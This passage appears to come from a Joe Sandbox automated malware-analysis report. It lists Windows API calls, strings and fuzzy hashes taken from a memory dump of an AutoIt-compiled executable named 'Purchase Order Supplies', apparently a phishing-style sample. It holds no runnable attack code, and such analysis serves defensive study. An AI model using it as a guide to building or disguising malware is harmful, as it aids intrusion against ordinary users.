                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CFB86D
                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00CFB91A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CFB93C
                          • GetMenuItemInfoW.USER32(?), ref: 00CFB986
                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CFB9B3
                          • DrawMenuBar.USER32(?), ref: 00CFB9C2
                          • SetWindowTextW.USER32(?,0000014E), ref: 00CFB9EA
                          Strings
                          Similarity
                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                          • String ID: 0
                          • API String ID: 1073566785-4108050209
                          APIs
                          • GetCursorPos.USER32(?), ref: 00CF7587
                          • GetDesktopWindow.USER32 ref: 00CF759C
                          • GetWindowRect.USER32(00000000), ref: 00CF75A3
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CF7605
                          • DestroyWindow.USER32(?), ref: 00CF7631
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CF765A
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CF7678
                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CF769E
                          • SendMessageW.USER32(?,00000421,?,?), ref: 00CF76B3
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CF76C6
                          • IsWindowVisible.USER32(?), ref: 00CF76E6
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CF7701
                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CF7715
                          • GetWindowRect.USER32(?,?), ref: 00CF772D
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00CF7753
                          • GetMonitorInfoW.USER32 ref: 00CF776D
                          • CopyRect.USER32(?,?), ref: 00CF7784
                          • SendMessageW.USER32(?,00000412,00000000), ref: 00CF77EF
                          Strings
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CAA839
                          • GetSystemMetrics.USER32(00000007), ref: 00CAA841
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CAA86C
                          • GetSystemMetrics.USER32(00000008), ref: 00CAA874
                          • GetSystemMetrics.USER32(00000004), ref: 00CAA899
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00CAA8B6
                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00CAA8C6
                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00CAA8F9
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00CAA90D
                          • GetClientRect.USER32(00000000,000000FF), ref: 00CAA92B
                          • GetStockObject.GDI32(00000011), ref: 00CAA947
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAA952
                            • Part of subcall function 00CAB736: GetCursorPos.USER32(000000FF), ref: 00CAB749
                            • Part of subcall function 00CAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB766
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000001), ref: 00CAB78B
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000002), ref: 00CAB799
                          • SetTimer.USER32(00000000,00000000,00000028,00CAACEE), ref: 00CAA979
                          Strings
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00CF6A52
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CF6B12
                          Strings
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 3974292440-719923060
                          APIs
                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00CCE6E1
                          • _wcscmp.LIBCMT ref: 00CCE6F2
                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00CCE71A
                          • CharUpperBuffW.USER32(?,00000000), ref: 00CCE737
                          • _wcscmp.LIBCMT ref: 00CCE755
                          • _wcsstr.LIBCMT ref: 00CCE766
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCE79E
                          • _wcscmp.LIBCMT ref: 00CCE7AE
                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00CCE7D5
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCE81E
                          • _wcscmp.LIBCMT ref: 00CCE82E
                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00CCE856
                          • GetWindowRect.USER32(00000004,?), ref: 00CCE8BF
                          Strings
                          Similarity
                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                          • String ID: @$ThumbnailClass
                          • API String ID: 1788623398-1539354611
                          APIs
                          Strings
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                          APIs
                          • LoadIconW.USER32(00000063), ref: 00CCF8AB
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CCF8BD
                          • SetWindowTextW.USER32(?,?), ref: 00CCF8D4
                          • GetDlgItem.USER32(?,000003EA), ref: 00CCF8E9
                          • SetWindowTextW.USER32(00000000,?), ref: 00CCF8EF
                          • GetDlgItem.USER32(?,000003E9), ref: 00CCF8FF
                          • SetWindowTextW.USER32(00000000,?), ref: 00CCF905
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CCF926
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CCF940
                          • GetWindowRect.USER32(?,?), ref: 00CCF949
                          • SetWindowTextW.USER32(?,?), ref: 00CCF9B4
                          • GetDesktopWindow.USER32 ref: 00CCF9BA
                          • GetWindowRect.USER32(00000000), ref: 00CCF9C1
                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00CCFA0D
                          • GetClientRect.USER32(?,?), ref: 00CCFA1A
                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00CCFA3F
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CCFA6A
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          APIs
                          • _wcscpy.LIBCMT ref: 00CE026A
                          • _wcschr.LIBCMT ref: 00CE0278
                          • _wcscpy.LIBCMT ref: 00CE028F
                          • _wcscat.LIBCMT ref: 00CE029E
                          • _wcscat.LIBCMT ref: 00CE02BC
                          • _wcscpy.LIBCMT ref: 00CE02DD
                          • __wsplitpath.LIBCMT ref: 00CE03BA
                          • _wcscpy.LIBCMT ref: 00CE03DF
                          • _wcscpy.LIBCMT ref: 00CE03F1
                          • _wcscpy.LIBCMT ref: 00CE0406
                          • _wcscat.LIBCMT ref: 00CE041B
                          • _wcscat.LIBCMT ref: 00CE042D
                          • _wcscat.LIBCMT ref: 00CE0442
                            • Part of subcall function 00CDC890: _wcscmp.LIBCMT ref: 00CDC92A
                            • Part of subcall function 00CDC890: __wsplitpath.LIBCMT ref: 00CDC96F
                            • Part of subcall function 00CDC890: _wcscpy.LIBCMT ref: 00CDC982
                            • Part of subcall function 00CDC890: _wcscat.LIBCMT ref: 00CDC995
                            • Part of subcall function 00CDC890: __wsplitpath.LIBCMT ref: 00CDC9BA
                            • Part of subcall function 00CDC890: _wcscat.LIBCMT ref: 00CDC9D0
                            • Part of subcall function 00CDC890: _wcscat.LIBCMT ref: 00CDC9E3
                          Similarity
                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                          • String ID: >>>AUTOIT SCRIPT<<<
                          APIs
                          • _memset.LIBCMT ref: 00CFCD0B
                          • DestroyWindow.USER32(00000000,?), ref: 00CFCD83
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CFCE04
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CFCE26
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFCE35
                          • DestroyWindow.USER32(?), ref: 00CFCE52
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C90000,00000000), ref: 00CFCE85
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFCEA4
                          • GetDesktopWindow.USER32 ref: 00CFCEB9
                          • GetWindowRect.USER32(00000000), ref: 00CFCEC0
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CFCED2
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CFCEEA
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                          • String ID: 0$tooltips_class32
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00CDB46D
                          • VariantCopy.OLEAUT32(?,?), ref: 00CDB476
                          • VariantClear.OLEAUT32(?), ref: 00CDB482
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00CDB561
                          • __swprintf.LIBCMT ref: 00CDB591
                          • VarR8FromDec.OLEAUT32(?,?), ref: 00CDB5BD
                          • VariantInit.OLEAUT32(?), ref: 00CDB63F
                          • SysFreeString.OLEAUT32(00000016), ref: 00CDB6D1
                          • VariantClear.OLEAUT32(?), ref: 00CDB727
                          • VariantClear.OLEAUT32(?), ref: 00CDB736
                          • VariantInit.OLEAUT32(00000000), ref: 00CDB772
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00CF6FF9
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CF7044
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CFE3BB
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CF9615,?), ref: 00CFE417
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE457
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE49C
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFE4D3
                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,00CF9615,?), ref: 00CFE4DF
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CFE4EF
                          • DestroyCursor.USER32(?), ref: 00CFE4FE
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CFE51B
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CFE527
                            • Part of subcall function 00CB1BC7: __wcsicmp_l.LIBCMT ref: 00CB1C50
                          Similarity
                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                          • String ID: .dll$.exe$.icl
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 00CE0EFF
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CE0F0F
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CE0F1B
                          • __wsplitpath.LIBCMT ref: 00CE0F79
                          • _wcscat.LIBCMT ref: 00CE0F91
                          • _wcscat.LIBCMT ref: 00CE0FA3
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00CE0FB8
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0FCC
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0FFE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE101F
                          • _wcscpy.LIBCMT ref: 00CE102B
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CE106A
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                          • String ID: *.*
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • CharLowerBuffW.USER32(?,?), ref: 00CDDB26
                          • GetDriveTypeW.KERNEL32 ref: 00CDDB73
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDDBBB
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDDBF2
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDDC20
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          Similarity
                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00D04085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00CD3145
                          • LoadStringW.USER32(00000000,?,00D04085,00000016), ref: 00CD314E
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00D04085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00CD3170
                          • LoadStringW.USER32(00000000,?,00D04085,00000016), ref: 00CD3173
                          • __swprintf.LIBCMT ref: 00CD31B3
                          • __swprintf.LIBCMT ref: 00CD31C5
                          • _wprintf.LIBCMT ref: 00CD326C
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD3283
                          Similarity
                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00CDD96C
                          • __swprintf.LIBCMT ref: 00CDD98E
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDD9CB
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CDD9F0
                          • _memset.LIBCMT ref: 00CDDA0F
                          • _wcsncpy.LIBCMT ref: 00CDDA4B
                          • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00CDDA80
                          • CloseHandle.KERNEL32(00000000), ref: 00CDDA8B
                          • RemoveDirectoryW.KERNEL32(?), ref: 00CDDA94
                          • CloseHandle.KERNEL32(00000000), ref: 00CDDA9E
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                          • String ID: :$\$\??\%s
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CFE564
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00CFE57B
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CFE586
                          • CloseHandle.KERNEL32(00000000), ref: 00CFE593
                          • GlobalLock.KERNEL32(00000000), ref: 00CFE59C
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CFE5AB
                          • GlobalUnlock.KERNEL32(00000000), ref: 00CFE5B4
                          • CloseHandle.KERNEL32(00000000), ref: 00CFE5BB
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CFE5CC
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D1D9BC,?), ref: 00CFE5E5
                          • GlobalFree.KERNEL32(00000000), ref: 00CFE5F5
                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00CFE619
                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00CFE644
                          • DeleteObject.GDI32(00000000), ref: 00CFE66C
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CFE682
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3840717409-0
                          • Opcode ID: b1f21e89a59babc353d1ee4b2f0994570112dc40870293f696b046f010b6b74d
                          • Instruction ID: e7235fd166c9d2d8370787953d4c768774d987237fffae89bc3796d318469a31
                          • Opcode Fuzzy Hash: b1f21e89a59babc353d1ee4b2f0994570112dc40870293f696b046f010b6b74d
                          • Instruction Fuzzy Hash: DD414A75600308BFDB119F65DC48EAA7BBAEF89715F108058F916D7260DB309E42DB20
                          APIs
                          • __wsplitpath.LIBCMT ref: 00CE0C93
                          • _wcscat.LIBCMT ref: 00CE0CAB
                          • _wcscat.LIBCMT ref: 00CE0CBD
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00CE0CD2
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0CE6
                          • GetFileAttributesW.KERNEL32(?), ref: 00CE0CFE
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CE0D18
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0D2A
                          Strings
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                          • String ID: *.*
                          • API String ID: 34673085-438819550
                          • Opcode ID: bc64d67e613f5bfce5b832004f9afde765bce277aa19c906e80378d8b0381b3f
                          • Instruction ID: f072d9000ce06fa7bdee58a29a19b5cc89e6d4863157132c8e738d8741853acc
                          • Opcode Fuzzy Hash: bc64d67e613f5bfce5b832004f9afde765bce277aa19c906e80378d8b0381b3f
                          • Instruction Fuzzy Hash: F581B4715043859FC720DF66C8459AAB7E8BB88314F34892AF895C7251E774DEC4CB92
                          APIs
                            • Part of subcall function 00CCB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCB903
                            • Part of subcall function 00CCB8E7: GetLastError.KERNEL32(?,00CCB3CB,?,?,?), ref: 00CCB90D
                            • Part of subcall function 00CCB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00CCB3CB,?,?,?), ref: 00CCB91C
                            • Part of subcall function 00CCB8E7: RtlAllocateHeap.NTDLL(00000000,?,00CCB3CB), ref: 00CCB923
                            • Part of subcall function 00CCB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCB93A
                            • Part of subcall function 00CCB982: GetProcessHeap.KERNEL32(00000008,00CCB3E1,00000000,00000000,?,00CCB3E1,?), ref: 00CCB98E
                            • Part of subcall function 00CCB982: RtlAllocateHeap.NTDLL(00000000,?,00CCB3E1), ref: 00CCB995
                            • Part of subcall function 00CCB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CCB3E1,?), ref: 00CCB9A6
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CCB5F7
                          • _memset.LIBCMT ref: 00CCB60C
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CCB62B
                          • GetLengthSid.ADVAPI32(?), ref: 00CCB63C
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00CCB679
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CCB695
                          • GetLengthSid.ADVAPI32(?), ref: 00CCB6B2
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CCB6C1
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CCB6C8
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CCB6E9
                          • CopySid.ADVAPI32(00000000), ref: 00CCB6F0
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CCB721
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CCB747
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CCB75B
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          • Opcode ID: ab57baf3a1729cd7a7aa6142eb67baa6ff74964d74d4ac37e6a27bdf0b14c65f
                          • Instruction ID: 03b347074ae9e389ef69ac68aa1e97b86a52adad0d58d2eee872f937e4786ce1
                          • Opcode Fuzzy Hash: ab57baf3a1729cd7a7aa6142eb67baa6ff74964d74d4ac37e6a27bdf0b14c65f
                          • Instruction Fuzzy Hash: AC51297590020AABDF049FA4DD46EEEBB79BF48344F04815DF925E6290DB35DE06CB60
                          APIs
                          • GetDC.USER32(00000000), ref: 00CEA2DD
                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CEA2E9
                          • CreateCompatibleDC.GDI32(?), ref: 00CEA2F5
                          • SelectObject.GDI32(00000000,?), ref: 00CEA302
                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CEA356
                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00CEA392
                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CEA3B6
                          • SelectObject.GDI32(00000006,?), ref: 00CEA3BE
                          • DeleteObject.GDI32(?), ref: 00CEA3C7
                          • DeleteDC.GDI32(00000006), ref: 00CEA3CE
                          • ReleaseDC.USER32(00000000,?), ref: 00CEA3D9
                          Strings
                          Similarity
                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: 9978da1fd063fd28c33cab5bda2fece7463f71f2d72ededf06921f0b412dddbd
                          • Instruction ID: e1ac2d1ace55b4953f89d565fed00e831ac2abbe4093af1d801ee1f7267b1208
                          • Opcode Fuzzy Hash: 9978da1fd063fd28c33cab5bda2fece7463f71f2d72ededf06921f0b412dddbd
                          • Instruction Fuzzy Hash: F6514975900349AFCB14CFA9CC84EAEBBB9EF48310F14841DF95AA7310C731A9418B60
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 00CDD567
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CDD589
                          • __swprintf.LIBCMT ref: 00CDD5DC
                          • _wprintf.LIBCMT ref: 00CDD68D
                          • _wprintf.LIBCMT ref: 00CDD6AB
                          Strings
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2116804098-2391861430
                          • Opcode ID: 897b8b671e4163b5cb439548bb682b9bcbd9d1a22bcbd9f01c09bb4c748a17ff
                          • Instruction ID: b6255ca899f30fc56cecd0c77e5d31feaf1267fb2b6b324e600daaf82f1ed88f
                          • Opcode Fuzzy Hash: 897b8b671e4163b5cb439548bb682b9bcbd9d1a22bcbd9f01c09bb4c748a17ff
                          • Instruction Fuzzy Hash: DA51B471800209BBCF15EBA4DD46EEEB779AF14300F104566F606B21A1EF719F58EBA0
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00CDD37F
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00CDD3A0
                          • __swprintf.LIBCMT ref: 00CDD3F3
                          • _wprintf.LIBCMT ref: 00CDD499
                          • _wprintf.LIBCMT ref: 00CDD4B7
                          Strings
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2116804098-3420473620
                          • Opcode ID: b3e99cccad86f97321b4d8f86b59dbcf998a98bc98c1f7dade56a8724c2fb0cf
                          • Instruction ID: 70632120c54730e6ee37f9f55db9dd0ee8d160aa4cf9c6a9151418c2c36904c2
                          • Opcode Fuzzy Hash: b3e99cccad86f97321b4d8f86b59dbcf998a98bc98c1f7dade56a8724c2fb0cf
                          • Instruction Fuzzy Hash: 0051C372800209BBCF15EBA4DD46EEEB779AF14700F104166F206B21A1EB756F58EB61
                          APIs
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • _memset.LIBCMT ref: 00CCAF74
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CCAFA9
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CCAFC5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CCAFE1
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CCB00B
                          • CLSIDFromString.COMBASE(?,?), ref: 00CCB033
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CCB03E
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CCB043
                          Strings
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 1411258926-22481851
                          • Opcode ID: 4d03df6bd9be36ea314505b0a241ef8ede4c5f80c7e893617b7917b163d02b19
                          • Instruction ID: 5b1b9506d20104efafa5e7491d6b96b2c2d600bc57dbaa847798cb4ca1b7dbf1
                          • Opcode Fuzzy Hash: 4d03df6bd9be36ea314505b0a241ef8ede4c5f80c7e893617b7917b163d02b19
                          • Instruction Fuzzy Hash: 44410876C1022DABCF11EBA4DC89DEEB779BF18704F404169F911A21A0EB709E05DF60
                          APIs
                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          Strings
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          • API String ID: 3964851224-909552448
                          • Opcode ID: 63c0aebc7b5711d74f588a50a197418826eb66eafa6ab5134b8c008aba4497d6
                          • Instruction ID: 4f77ce1cafcc0530232dc96d056ceaaef4f4dd3060b0010dcef118f1eb081077
                          • Opcode Fuzzy Hash: 63c0aebc7b5711d74f588a50a197418826eb66eafa6ab5134b8c008aba4497d6
                          • Instruction Fuzzy Hash: 0941AB3410028EABCF44EF44D841BFA3361BF17394F154928EDA16B295DB349E4ADBB2
                          APIs
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CD843F
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CD8455
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CD8466
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CD8478
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CD8489
                          Strings
                          Similarity
                          • API ID: SendString$_memmove
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 2279737902-1007645807
                          • Opcode ID: 2f45239146f5da8740b28c1541a9a51446856e6b94fc128623522a6e468a9ba9
                          • Instruction ID: ed98d3a2db3d3026405a6bb7dc7b69a1fe3a64c4eddb6f462756c1492c3d73b3
                          • Opcode Fuzzy Hash: 2f45239146f5da8740b28c1541a9a51446856e6b94fc128623522a6e468a9ba9
                          • Instruction Fuzzy Hash: 0A11A761A502AD7EDB20A7A5DC5ADFFBB7CEB91B00F44042AB511A21D1DEA05E4CC5B0
                          APIs
                          • timeGetTime.WINMM ref: 00CD809C
                            • Part of subcall function 00CAE3A5: timeGetTime.WINMM(?,7697B400,00D06163), ref: 00CAE3A9
                          • Sleep.KERNEL32(0000000A), ref: 00CD80C8
                          • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00CD80EC
